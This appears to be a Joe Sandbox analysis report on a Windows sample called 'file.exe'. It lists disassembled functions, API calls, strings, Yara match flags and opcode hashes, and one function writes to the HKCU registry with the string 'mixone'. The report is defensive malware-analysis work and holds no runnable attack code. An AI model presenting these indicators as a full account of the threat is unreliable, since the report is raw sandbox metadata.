                                                Function 04B74033 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                                • Instruction ID: 143d90ba875223aeca4a41e852f491a56e77f475b64ad04eb166117007b8ab15
                                                • Opcode Fuzzy Hash: 40243c521aab70af30abc9ec0642881d9f494199df659fe1a780e76705c17a36
                                                • Instruction Fuzzy Hash: B3B19732A00265AFEF11CF68CC81BBEBFA4EF45345F0441E5E964AB281D374B910C7A0
                                                Function 100028D6 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • __RTC_Initialize.LIBCMT ref: 1000291D
                                                • ___scrt_uninitialize_crt.LIBCMT ref: 10002937
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: Initialize___scrt_uninitialize_crt
                                                • String ID:
                                                • API String ID: 2442719207-0
                                                • Opcode ID: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                • Instruction ID: 04769ff959a67eddfc0a91c70c155494b73e6b711ec1a15a155288148215b0b0
                                                • Opcode Fuzzy Hash: bcaf1c042ea0bc50edbc81b8ebd31fe72f9a2e1de53f2412ad321d30f710d584
                                                • Instruction Fuzzy Hash: 3741F372E05229AFFB21CF68CC41BAF7BA4EB846D0F114119F84467258DB309E419BA1
                                                Function 0040B7C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                Download Yara Rule
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 0040B7F7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B7FF
                                                • _ValidateLocalCookies.LIBCMT ref: 0040B888
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8B3
                                                • _ValidateLocalCookies.LIBCMT ref: 0040B908
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                                • Instruction ID: 0a5d0bd6c222bbdd43f8b319fa79a96d429a9708f3c046b0ae0cbd11a01f7e51
                                                • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                                • Instruction Fuzzy Hash: 11418535A00219DBCF10EF69C885A9EBBA5EF44318F14C17AE8147B3E2D7399905CBD9
                                                Function 04D0ABC0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                Download Yara Rule
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 04D0ABF7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 04D0ABFF
                                                • _ValidateLocalCookies.LIBCMT ref: 04D0AC88
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 04D0ACB3
                                                • _ValidateLocalCookies.LIBCMT ref: 04D0AD08
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                                • Instruction ID: f3c310302b0c40c20b9b34b855988e141cdf130191ac3f7e6030e8d48a8665a6
                                                • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                                • Instruction Fuzzy Hash: 8641A134B00308ABCF10DF68C884B9EBBA5FF44328F15C155E8155B391D775B905CBA5
                                                Function 10003A20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                Download Yara Rule
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 10003A57
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                                • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                                • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                                • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                                Function 100072FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 0-537541572
                                                • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                                • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                                Function 00413339 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,00413448,00403597,?,00000000,00402809,0040280B,?,004135C1,00000022,FlsSetValue,00422950,00422958,00402809), ref: 004133FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 3664257935-537541572
                                                • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                • Instruction ID: 89836d951bc72d4e20e2faa1a52db581b462940ce5fd44a8dff6846afbaeb460
                                                • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                • Instruction Fuzzy Hash: A3212731B01214EBDB329F21DC44ADB7B68AB41765B200133ED15A73D1DA78EE46C6DC
                                                Function 1000C5BF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 1000C587: _free.LIBCMT ref: 1000C5AC
                                                • _free.LIBCMT ref: 1000C60D
                                                  • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                  • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                • _free.LIBCMT ref: 1000C618
                                                • _free.LIBCMT ref: 1000C623
                                                • _free.LIBCMT ref: 1000C677
                                                • _free.LIBCMT ref: 1000C682
                                                • _free.LIBCMT ref: 1000C68D
                                                • _free.LIBCMT ref: 1000C698
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                • Instruction ID: 1780f257e170a803287b818d598211b5e25d48ac92953e35ea001cf34306b7c8
                                                • Opcode Fuzzy Hash: c4c0a627cdf80609df9843e8342f0dd46d11e13b3267d69b732be6628a16741d
                                                • Instruction Fuzzy Hash: 25115479940B08AAF520EB70CC47FCF7B9CEF457C1F400819B29D76097DA75B6484AA1
                                                Function 1000B6D8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                                • __fassign.LIBCMT ref: 1000B905
                                                • __fassign.LIBCMT ref: 1000B922
                                                • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                • String ID:
                                                • API String ID: 1735259414-0
                                                • Opcode ID: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                                • Opcode Fuzzy Hash: 32d4bb0d0fb78e9b700753294cc147154fce03c70a5209c95aaa7034331b4c1e
                                                • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                                Function 0040B984 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,0040B97B,0040AF1F,0040A730), ref: 0040B992
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9A0
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9B9
                                                • SetLastError.KERNEL32(00000000,0040B97B,0040AF1F,0040A730), ref: 0040BA0B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                • Instruction ID: c1383cefff0a9c77c0f6256a7d22d0577fd0bc713188e5814d490c4ea7085b9f
                                                • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                • Instruction Fuzzy Hash: 6D0192727197119EE63427B97CC6A6B2B94EB01778760033BF520752E2EB39480255CC
                                                Function 10003DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                                • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                                • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                                Function 04B6BBEB Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,04B6BBE2,04B6B186,04B6A997), ref: 04B6BBF9
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04B6BC07
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04B6BC20
                                                • SetLastError.KERNEL32(00000000,04B6BBE2,04B6B186,04B6A997), ref: 04B6BC72
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                • Instruction ID: 2a41b152595a7504c53bb8ca46dbe145aae3d74ac4d8e0498f82aa76182e0391
                                                • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                • Instruction Fuzzy Hash: 3101793620D6219EA73427BD7CC496B2F64E70567872002B9E537D61E1EE5975016144
                                                Function 004015D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Xinvalid_argument.LIBCPMT ref: 004015D5
                                                  • Part of subcall function 00409842: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040984E
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,00000000,?,?,0042D884,?,?,?,0042DAF4), ref: 0040160B
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,12041A13,00000000,?,0042D884,?,?,?,0042DAF4), ref: 00401642
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00401757
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                • String ID: string too long
                                                • API String ID: 2123813255-2556327735
                                                • Opcode ID: 281a2476be6cc453a5ad27d9da9e1dc32d507c6cc5bf7aa10868f271ceef2746
                                                • Instruction ID: 8b29ff92f67febe7d184f40cd986ab90276924f3587203b15f4be4e0e60d2281
                                                • Opcode Fuzzy Hash: 281a2476be6cc453a5ad27d9da9e1dc32d507c6cc5bf7aa10868f271ceef2746
                                                • Instruction Fuzzy Hash: 5E4127B1A00300ABD720AF759C8575BB7B8EF48354F24063AF91AE73D1E775AD0487A9
                                                Function 004058D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122registrysleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405925
                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040594D
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405956
                                                • Sleep.KERNEL32(000005DC), ref: 00405A90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CloseCreateOpenSleepValue
                                                • String ID: mixone
                                                • API String ID: 4111408922-3123478411
                                                • Opcode ID: 5956f32b293078b1f23111287794b54aa008f1a70d72d9563616efc3db9a2cf7
                                                • Instruction ID: 36deb0a2def4af7d69c3889f60f670a394a8a5da25757ff3a02b89eea185ed5b
                                                • Opcode Fuzzy Hash: 5956f32b293078b1f23111287794b54aa008f1a70d72d9563616efc3db9a2cf7
                                                • Instruction Fuzzy Hash: F3418571210108AFEB08DF58DC95BEE7B65EF08300F908229F955AB5D1D778E9848F58
                                                Function 10008336 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                Download Yara Rule
                                                Strings
                                                • C:\Users\user\Desktop\file.exe, xrefs: 1000833B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\Desktop\file.exe
                                                • API String ID: 0-3695852857
                                                • Opcode ID: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                • Instruction ID: d1df9cd49d1a9d965a935ddcfcfd3b9185eaf4079d6f623355f3cc1fa6217373
                                                • Opcode Fuzzy Hash: ddfca3805b10fb0c405c12195d97b130fb222a2330a05fb996068ff6147a541c
                                                • Instruction Fuzzy Hash: C821D075A00206BFF710DF61CC8090B779CFF846E47108124FA949215AEB31EF0087A0
                                                Function 00410580 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,024FEF0D,0040280B,?,00000000,0041DA7B,000000FF,?,0041055C,08758BC2,?,00410530,00000016), ref: 004105B5
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004105C7
                                                • FreeLibrary.KERNEL32(00000000,?,00000000,0041DA7B,000000FF,?,0041055C,08758BC2,?,00410530,00000016), ref: 004105E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: d9f390a0c8d24d43879d0675fee7d7aa557a7bdfd7840f409546c87a96f2ba59
                                                • Instruction ID: f4dd53f2cc94282f557b0741292325b7031a84366b21a1c3c136dd1e19965a8c
                                                • Opcode Fuzzy Hash: d9f390a0c8d24d43879d0675fee7d7aa557a7bdfd7840f409546c87a96f2ba59
                                                • Instruction Fuzzy Hash: F501A271A44625FBDB128F80DC05BEEBBB9FB04B51F004536F811A22A0DBB8A944CB58
                                                Function 10005FAA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                                • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                                • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                                Function 1000A5DD Relevance: 7.7, APIs: 5, Instructions: 244COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,1000A899,00000000,00000000,00000000,00000001,?,?,?,?,00000001), ref: 1000A680
                                                • __alloca_probe_16.LIBCMT ref: 1000A736
                                                • __alloca_probe_16.LIBCMT ref: 1000A7CC
                                                • __freea.LIBCMT ref: 1000A837
                                                • __freea.LIBCMT ref: 1000A843
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: __alloca_probe_16__freea$Info
                                                • String ID:
                                                • API String ID: 2330168043-0
                                                • Opcode ID: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                • Instruction ID: 1dd90d70d9504398cfa9d6ef4ea6864651e072268de8b4bf5549d7cf43e308ef
                                                • Opcode Fuzzy Hash: 8cc199d558b997503fdcee74a17b35d0cfef9a10842a3a6720ec3a40d10b29e0
                                                • Instruction Fuzzy Hash: C081A472D042569BFF11CE648C81ADE7BF5EF0B6D0F158265E904AB148DB369DC1CBA0
                                                Function 1000AFB7 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                Download Yara Rule
                                                APIs
                                                • __alloca_probe_16.LIBCMT ref: 1000B03B
                                                • __alloca_probe_16.LIBCMT ref: 1000B101
                                                • __freea.LIBCMT ref: 1000B16D
                                                  • Part of subcall function 100079EE: RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                • __freea.LIBCMT ref: 1000B176
                                                • __freea.LIBCMT ref: 1000B199
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                • String ID:
                                                • API String ID: 1423051803-0
                                                • Opcode ID: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                • Instruction ID: ca0e6193c5ab93552cef367aef9b2c098b98f9a761b18089088d519bce5e91c7
                                                • Opcode Fuzzy Hash: e63f2a8978e00137fdd1d9a780ebd3875915c182c7a46276be8a26015b9944ff
                                                • Instruction Fuzzy Hash: 6651C072600616ABFB21CF64CC81EAF37E9EF456D0F624129FD14A7158EB34EC5197A0
                                                Function 00415010 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                Download Yara Rule
                                                APIs
                                                • __alloca_probe_16.LIBCMT ref: 00415095
                                                • __alloca_probe_16.LIBCMT ref: 0041515E
                                                • __freea.LIBCMT ref: 004151C5
                                                  • Part of subcall function 00413C79: RtlAllocateHeap.NTDLL(00000000,00402809,00402805,?,0040AD1B,0040280B,00402805,0042D884,?,?,00403597,?,00402809,00402805), ref: 00413CAB
                                                • __freea.LIBCMT ref: 004151D8
                                                • __freea.LIBCMT ref: 004151E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                • String ID:
                                                • API String ID: 1423051803-0
                                                • Opcode ID: c0223aac213706da923d74aec6f81ab2cdbbbf03147a9c613dee044af7b571ef
                                                • Instruction ID: def92c4ecd74f4627ee81fabb5ad5435351d3551a42f570b1979e48308b83863
                                                • Opcode Fuzzy Hash: c0223aac213706da923d74aec6f81ab2cdbbbf03147a9c613dee044af7b571ef
